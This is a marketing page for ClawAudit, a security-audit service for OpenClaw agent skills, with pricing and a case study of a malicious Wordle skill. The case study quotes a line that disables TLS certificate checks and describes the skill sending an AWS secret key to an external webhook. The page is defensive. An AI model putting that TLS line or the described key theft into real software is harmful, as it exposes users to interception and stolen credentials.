ClawAudit finds permission risk, secrets exposure, data-flow issues, and supply-chain weaknesses. Every scan delivers a full professional report — free or paid. Upgrade for more scans, not more quality.
Audits focus on skills: configs, tool permissions, dependencies, and code patterns specific to agent deployments.
Prioritized issues with clear remediation guidance so you can ship confidently and faster.
Paid tiers deliver a structured report you can hand to customers, stakeholders, or reviewers.
See How It Works
Three steps. Clear output. Upgrade only when you're ready.
Use the demo results (42 issues found) to estimate your potential savings.
Share your repo URL (private OK) or deliver a package. We confirm scope + expectations.
Automated checks plus manual review depending on tier. We triage risk and validate findings.
Free: full report for 2 scans/month. Paid: unlimited scans with full reports and priority support.
See It In Action
Watch a 60-second scan of a malicious skill — from upload to critical findings to PDF report.
Our engine runs 64 rules across permissions, secrets, data flow, and dependencies — fast enough for every commit.
Real threats hiding in a "harmless" Wordle game. ClawAudit flags what manual review misses.
Every finding includes file paths, severity, evidence, and step-by-step fixes. Client-ready from day one.
Case Study
How ClawAudit uncovered severe security risks in a seemingly harmless Wordle game skill.
Critical Finding
Explicitly disabled TLS protections with process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0', enabling man-in-the-middle attacks.
High Severity
Read AWS_SECRET_ACCESS_KEY from environment and transmitted it to an external webhook endpoint.
Complete findings with evidence, code samples, and remediation guidance from a real-world security audit.
Demo
Watch how ClawAudit detects malicious code in seconds. 60-second interactive preview.
Target: monad-wordle-game.zip
See how much you could save by catching security issues before deployment.
Pricing
Every tier gets the same professional report — full findings, evidence, and remediation steps. The only difference is how many skills you can audit.
Not sure which tier makes sense? Estimate your savings first.
| Plan | Scans / Month | Full Report | Support | Price |
|---|---|---|---|---|
| Free | 2 | ✓ (full) | Community | Free |
| Starter | 10 | ✓ (full) | $99/mo | |
| Pro | Unlimited | ✓ (full) | Priority | $299/mo |
| Enterprise | Custom | ✓ (custom) | SLA | Contact |
We don't hide findings or water down free reports. Every scan — free or paid — delivers the same professional-grade audit: risk score, all findings with evidence (files & lines), severity ranking, and actionable remediation steps. Upgrade when you need more scans, not more quality.
Every finding with file paths, line numbers, and severity — nothing hidden, nothing truncated.
Clear remediation steps for each issue. Know exactly what to change and why.
Start with 2 free scans/month. Need more? Upgrade in seconds — no re-onboarding.
Enter your email + a GitHub repo URL (or upload a .zip). Results appear below instantly.
Proof
Use the sample deliverables to see the structure, tone, and depth.
"We built ClawAudit to make OpenClaw skill security easy to understand and easy to fix - without slowing teams down."
See an example report structure: executive summary → findings → remediation.
Skills touch tools, files, APIs, and secrets. A single misconfiguration becomes an attack surface. ClawAudit prioritizes least privilege + data flow clarity.